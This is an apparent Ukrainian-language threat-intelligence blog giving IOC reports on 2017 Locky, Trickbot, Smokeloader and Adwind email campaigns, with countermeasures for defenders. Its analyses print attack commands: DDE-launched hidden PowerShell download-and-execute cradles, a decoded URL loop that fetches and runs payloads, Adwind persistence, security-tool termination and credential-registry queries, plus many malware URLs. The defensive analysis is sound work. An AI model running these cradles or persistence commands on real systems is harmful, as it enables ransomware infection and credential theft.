MS Office DDE як елемент доставки ШПЗ

IOC_Locky(DDE)_191017

Вчора на аналіз мені передали перший зразок документу-приманки, який використовує DDE для запуску процесу доставки Locky Ransomware.

Механізм Dynamic Data Exchange (DDE) є протоколом який дозволяє передачу даними між додатками. Він може бути застосований для створення документу Word чи Excel, при відкритті якого буде виконуватися довільний код. Вперше про практичне використання DDE було опубліковано ще 9/10/17. Це схоже на спосіб із OLE з яким ми уже мали справу (див JAR_OLE та JS_OLE), але замість вбудованого об’єкту при використанні DDE в документ “зашивається” команда на виконання тої чи іншої дії. Чому це становить небезпеку? В даному випадку в документі немає макросу, отже він має високі шанси пройти механізми фільтрації.

Рівень загрози – високий. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload вже детектуєтся по GTI.

Трохи аналітики:

В даному випадку зловмисники застосували DDE для обходу фільтрів пошти.

Для обходу блокування систем, що розповсюджують був введений проміжний список (перша команда powershell).

Для ускладнення виявлення кінцевої мети був введений проміжний downloader який оцінює систему і може не продовжити роботу.

(!)Цей зразок Locky має вбудовану можливість розповсюдження по локальній мережі через вразливість SMB (подібно до WannaCry)

Схема атаки:

email > .doc (DDE) > powershell > GET URL list > GET downloader > %temp%\*.exe > GET encoded payload > %temp%\*.exe

Маркери IOC:

File name I_141268.doc
SHA-256 4a7f805f6b8fec64d3cf07c02a1d200c703ce4cc6ddf2dabd56ad9d6c936c603
File size 13.03 KB

При відкритті файлу користувач бачить два повідомлення-попередження про “відновлення зв’язків”:

Якщо увімкнути відображення форм то можна побачити саму команду:

Якщо жертва натискає “Ок” в фоні winword.exe створює дочірній процес cmd та через нього передає команду на powershell:

WINWORD.EXE /n "C:\Users\operator\Desktop\I_213380.doc" /o "u" 

cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -e DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOg...==

Якщо декодувати отримаємо:

$urls = "h11p://shamanic-extracts.biz/eurgf837or","h11p://centralbaptistchurchnj.org/eurgf837or","","h11p://conxibit.com/eurgf837or" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Запуск цієї команди призводить до завантаження основного тіла з одної із трьох переданих адрес та запис тіла у каталог %temp%

File name eurgf837or  >>  temp\rekakva32.exe 
SHA-256 d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4
File size 113.75 KB

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

rekakva32.exe > h11p://hair-select.jp/fef44gddd.enc

File name fef44gddd.enc
SHA-256 6686965dc309055937e048e9bd13e3cbb5a97a550e2af7d86914f9241e5b033e
File size 636 KB

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename  5l46zw33.exe
SHA-256 4c054127056fb400acbab7825aa2754942121e6c49b0f82ae20e65422abdee4f
File size 636 KB

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширрення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

66.36.173.246:80    HTTP 135 ryanbaptistchurch.com GET /KJHDhbje71 HTTP/1.1

перебір джерел проміжного payload

176.103.130.130:80 HTTP 135 shamanic-extracts.biz GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 140 centralbaptistchurchnj.org GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 126 conxibit.com GET /eurgf837or HTTP/1.1

завантаження кодованого тіла Locky

180.222.185.74:80   HTTP 157 hair-select.jp GET /fef44gddd.enc HTTP/1.1

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Додаткові джерела по темі DDE

  1. Microsoft Office Attack Runs Malware Without Needing Macros
  2. Malware delivered via Necurs botnet by DDE feature in Microsoft Word
  3. How to protect yourself from exploits in Office programs
VR
Advertisements

Еволюція скриптів

До того, що скрипти-приманки можуть містити кілька зпасних посилань ми вже звикли.

Також звикли до перевірки Public IP та вибору з двох гілок завантажень.

Сьогодні ботнет Necurs розповсюджував новий варіант VBS скрипта, активація кого призводила до завантаження payload лише за певних умов:

File name: Invoice 89533683 10.18.2017.vbs
SHA-256: f166c84f7b732c380fd4a73540eec12d74290a04155edad7a1f4848811090867
File size 10.37 KB

Скрипт виконує збір параметрів про ОС та надсилає їх через POST запит

"POST", "http://haddownding.net/trtrtr.php",false [163.172.153.154]

В залежності від відповіді на цей запит скрипт або отримує адресу на завантаження payload або ж завершується.

Скрипт який потрапив мені сьогодні до рук буув орієнтований на системи з двох країн

так машини із США отримували
niv785yg _ Locky
Filename niv785yg
Size 623KiB (637952 bytes)
SHA256 64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484
dbatee[.]gr/niv785yg
goliathstoneindustries[.]com/niv785yg
3overpar[.]com/niv785yg
pciholog[.]ru/niv785yg
disfrance[.]net/p66/niv785yg
а системи з Великобританії
iuty56g _ Trickbot
Filename iuty56g.exe
Size 393KiB (401920 bytes)
SHA256 9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b
envi-herzog[.]de/iuty56g
pac-provider[.]com/iuty56g
pesonamas.co[.]id/iuty56g
disfrance[.]net/p66/iuty56g

Природньо що на моїй тестовій системі скрипт завершився одразу.

Дані про джерела були взяті з блогу My Online Security

Варто бути готовим до того, що схожі скрипти перепишуть та переорієнтують на український сектор.

Тому краще заздалегіть вжити відповідних заходів, а саме:

Контрзаходи: (прості але дієві)

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесів WScript.exe, CScript.exe, Powershell.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й) – радикально проте раз і назважди
  • Заборона створення та зчитування/запуску *.JS*, *.VB*, *.WS*, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Для оптимального захисту:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_171017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядав раніше – тут, тут і тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітким іменем файлу.

Цікаво, що завантаження відбувається не через WSH а засобами Powershell.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектується по GTI.

Схема атаки:

email > Attach (7z) > JS > single hardcoded URL > GET > %temp%\65536.exe

Маркери IOC:

архів:

File name документи.7z
SHA-256 397ad07ab15f802559ac1829ac9c8434bc7c0b6fb55264b088659b638a28ad0d

скрипт приманка:

File name Договор_1743.js
SHA-256 56d9c0da7f825cb474633057e12a1cf197af2352bd0d876591483e2d40472fda

основна частина:

File name pax.exe      >> %temp%\65536.exe
SHA-256 99671ce5287926ac6496a37abd42c87cc1a045696244cc833c3dbc041270cc25

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Договор_1743.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://docfileserver.ru/bank/pax.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run 
Classes
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає новий екземпляр explorer.exe і оперує від його імені.

Трафік скомпрометованої системи:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Відволікаючи маневр – з’єднання із сайтами java, MS etc

[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT 
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED
[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

49.51.38.37 80 HTTP 368 docfileserver.ru GET /bank/pax.exe HTTP/1.1

трафік системи після зараження:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_121017

Доброго вечора, панове.

Вчора в першій половині дня було зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Він уже потрапляв в поле мого зору тричі: у червні 16го, у травні 17го та на початку вересня 17го.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Рейтинг приманки на VT – досі! docx 3/60, jar – 4/60.

Цього разу для обходу фільтрів застосували обгортку у вигляді OLE об’єкту у .docx файлі.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI.

Трохи аналітики:

Я завжди виділяв даний клас загроз з поміж усіх зразків, які мені доводилося розбирати.

Причина полягає в тому, що 90% того мотлоху який щоденно тоннами розсилається у мережі не залежно від типу та форми обгортки (dropper) зводиться до примітивного – “завантажити / розпакувати / запустити .exe” (payload)

Відповідно, ті, хто звертають увагу не лише на IOC, а й на мої рекомендації, вже знають, що більшість складних/хитрих схем інфікування можна поламати через правила Acces Protection або деактивацію відповідних механізмів ОС, що дозволяє зупинити активність зразків на початковій стадії, не допускаючи значних ушкоджень системи жертви. (тут мова про сигнатури взагалі не йде бо в момент розсилки їх просто не буде)

Коли ми говоримо про Adwind потрібно вживати додаткових заходів захисту адже зразки цього типу в процесі інфікування не створюють нових запусних файлів, вони використовують встановлену JRE з дійсним цифровим підписом на яку через параметр подаються команди із файлу. Після закріплення уся активність на яку може звернути увагу технічний спеціаліст це присутність процесу javaw.exe (який досить легко сплутати з оновленнями Java) у автозавантаженні та періодична мережева активність від імені цього ж процесу – погодьтеся, що це не  буде виглядати підозрілим для системи, на якій активно використовуються Java додатки.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

 

Схема атаки:

email > .docх > OLE > %temp%\Java Update.jar, *.class & *.vbs > %Userprofile%\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV

Маркери IOC:

File name Purchase Order & Product Specification.doc
SHA-256 2391153b1d1cce5645545e2e7f08361e4dbe44332f6d1730da2c2a9fa6086faa 
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File size 605.71 KB

File name Java Update.jar
SHA-256 b1cec81040e0d2408bfa1fc949899a6b99cc44e9aafe80fdf1d2bebd4e3f5a1d 
File Type application/x-java-archive; charset=binary
File size 542.64 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Java Update.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.5743056579312063127883038705222330.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive570114789299081000.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

це те, що має насторожити уважного адміна/ІБшника (про скрипти в %temp% я вже мовчу)

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v FwdqdYRuBhF /t REG_EXPAND_SZ /d 
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV\"" /f

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\feAvqJOQQQh\*.*"

– приховує свої файли через атрибути файлової системи

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV

– передача керування на файл з інструкціями з каталогу користувача

"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.147022225971277562635083797810489821.class 
%temp%\vaTFpntHCB8289512746733850272.reg
"cmd.exe" /c regedit.exe /s C:\tmp\vaTFpntHCB8289512746733850272.reg

– запуск скриптів ініціює часткову зачистку слідів, відкриття мережевих з’єднань і блокування системних та засобів захисту через Image File Execution Options, “debugger”

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

– збір інформації про встановленні драйвери PnP пристроїв – може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

на відміну від зразка за 16й рік, який цікавився не драйверами а параметрами брандмауєра

"taskkill" /IM UserAccountControlSettings.exe /T /F 
"taskkill" /IM Taskmgr.exe /T /F
"taskkill" /IM procexp.exe /T /F
"taskkill" /IM wireshark.exe /T /F

– спроба зупинити роботу довжелезного переліку засобів безпеки та утиліт моніторингу

reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" 
reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers"
reg  query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords"
reg  query "HKEY_CURRENT_USER\Software\Paltalk"
reg  query "HKEY_CURRENT_USER\Software\Beyluxe Messenger"
reg  query "HKEY_CURRENT_USER\Software\IMVU\username"
reg  query "HKEY_CURRENT_USER\Software\IMVU\password"

– перевірка цікавих ключів реєстру

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю:

victim_host:49309 > 5.133.15.1:1434 TCP

###

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Мережеві IOC:

victim_host:49309 > 5.133.15.1:1434 TCP

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_vbs_asorti_111017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки Locky Ransomware та Trickbot.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Трохи аналітики:

  • схожа розсилка вже проходила 28 версеня
  • скрипти містять 6 посилань на два різних payload (два Locky та trickbot)
  • адреси на  завантаження payload не обфусковані, проте додана перевірка коду країни
  • в залежності від приналежності public IP використовується одна з двох гілок URL
  • слід остерігатися появи схожих скриптів із обфускацією та завантаженням payload по HTTPS
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що dropper та payload Trickbot детектуються по GTI.

Схема атаки:

email > Attach (7z) > VBS > Country by IP? > choose URL > GET > %temp%\random.exe

Маркери IOC:

File Name F9785396895.vbs
SHA-256 30f064b3c28ba251ab30f77337724a0d449d12943720697bb06ce5999f2b6520

перевірка зовнішньої адреси:

dataUrls = Array(“http://freegeoip.net/json/“,”http://www.geoplugin.net/json.gp“,”https://ipinfo.io/json“)

дві гілки завантажень

ZimZamZum = Array("globoart.es/jhbfvg7?","fetchstats.net/p66/jhbfvg7","teracom.co.id/jhbfvg7?") 
Else
ZimZamZum = Array("missinglynxsystems.com/8y6ghhfg?","fetchstats.net/p66/8y6ghhfg","eurecas.org/8y6ghhfg?")
End If

по типам payload:

jhbfvg7 – trickbot

Filename nrbob.exe

SHA256  5553f1e00e182ca5a4aa58c7f0fecb0b7a81b697f04d8194121e818358cf2196Copy SHA256 to clipboard

8y6ghhfg – Locky

Filename BKAoQKtgfOM.exe

SHA256  c35f705df9e475305c0984b05991d444450809c35dd1d96106bb8e7128b9082fCopy SHA256 to clipboard

По зразкам Locky – поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

По trickbot – після запуску дублює своє тіло у

C:\Users\operator\AppData\Roaming\winapp\random.exe

Закріплюється через задачу системного планувальника

\services update c:\users\operator\appdata\roaming\winapp\random.exe

запускає новий екземпляр svchsot та інжектує себе у нього

C:\Windows\system32\svchost.exe > svchost.exe -k netsvcs

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

перевірка зовнішньої адреси

104.31.11.172 80 HTTP 460 freegeoip.net GET /json/ HTTP/1.1 
178.237.36.10 80 HTTP 466 www.geoplugin.net GET /json.gp HTTP/1.1
172.217.20.174 443 TCP 54 49377 → 443 [ACK] Seq=204 Ack=2837 Win=64240 Len=0 (HTTPS)

завантаження Trickbot

86.109.170.198 80 HTTP 290 globoart.es GET /jhbfvg7? HTTP/1.1 (+) Trickbot
91.225.48.94 80 HTTP 296 fetchstats.net GET /p66/jhbfvg7 HTTP/1.1 (+) Trickbot
202.169.44.149 80 HTTP 292 teracom.co.id GET /jhbfvg7? HTTP/1.1  (-) 404 Not Found

трафік після активації Trickbot

49.51.134.78 80 HTTP 100 unhanorarse.info POST /tr554.php HTTP/1.1  (application/x-www-form-urlencoded)

завантаження Locky

66.36.173.181 80 HTTP 302 missinglynxsystems.com GET /8y6ghhfg? HTTP/1.1 (-) 403 
91.241.236.102 80 HTTP 297 fetchstats.net GET /p66/8y6ghhfg HTTP/1.1 (+) Locky
185.58.7.11 80 HTTP 291 eurecas.org GET /8y6ghhfg? HTTP/1.1 (+) Locky

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_111017

Доброго вечора, панове.

Сьогодні зранку було зафіксовано спроби доставки троянського коду типу Smokeloader (розглядав раніше – тут та тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектуєтся по GTI.

Серед скомпрометованих сайтів, що розповсюджують шкідливий код – ООО “Радар Комплект” (h11p://radar.org.ua)

Схема атаки:

email > Attach (7z) > JS > 1 URL > GET > %temp%\random.exe

Маркери IOC:

архів:

File name Док. УЛФ-Финанс.7z
SHA-256 d100a27a4c0dc9c3eaf3c1d5099ec06dd48038818d1ebc325944ee61301024a6
архів:
скрипт приманка:
File name Накладная 001.js
SHA-256 185c98cf2a5dfa5969affadfea14341ecce6f86dbfd549e7e8c5f59fd9e98335

Запуск скрипта-приманки ініціює завантаження основної частини засобами WSCript.exe

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у %AppData%\Roamin\Microsoft\random\random.exe

Додає себе у автозавантаження через HCU\Run

Запускає новий екземпляр explorer.exe і оперую від його імені.

Трафік скомпрометованої системи:

47.88.63.235 80 HTTP bbank.bit POST

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

193.138.152.4 80 HTTP 384 h11p://www.poptavka-remeslnici.cz GET /profile/gallery/putty.exe HTTP/1.1 
46.36.223.11 80 HTTP 357 h11p://neocom21.com.ua GET /putty.exe HTTP/1.1
139.162.170.147 80 HTTP 358 h11p://www.radar.org.ua GET /putty.exe HTTP/1.1
47.88.63.235 80 HTTP 370 h11p://reanimationhelthcs.ru GET /foping/putty.exe HTTP/1.1


дані по листам:
IP:      82.207.79.108, 89.151.191.14
email: admyurist [@] cv.ukrtel.net, red_krarm [@] cbx.ru

трафік системи після зараження:

47.88.63.235 80 HTTP bbank.bit POST

Контрзаходи:

– – – – – – – – – – –

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_05-061017

Доброго дня, панове.

В черговий раз фіксуємо спроби доставки Locky Ransomware (вже розглядав , та ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Подробиці:

На аналіз були надані два зразки скриптів, які відносяться до однієї кампанії.

Їх активація призводить до завантаження одного й того ж зразка.

Скрипти містять по 3 посилання, перевірки коду країни не виявлено.

GET запити не відрізаються. Частина посилань досі активна!

Користувачі захисту McAfee, зверніть увагу на дві речі:

  • payload детектується по GTI
  • репутація посилань низька – блок на MWG, NSP та WebControl

Схема атаки:

email > Attach (7z) > VBS > 3 URL > HTTP GET > %temp%\random.exe

Маркери IOC:

File Name Invoice_INV000267.vbs
SHA-256 Hash Identifier 158851690993F35C542E43FEF8747487AF7DFDC2C7051F98AF8469EE287AC8A0
File Size 11829 bytes
File Type ASCII text

Plyask = Array("bnphealthcare.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","balzantruck.com/9hgfdfyr6?")

 

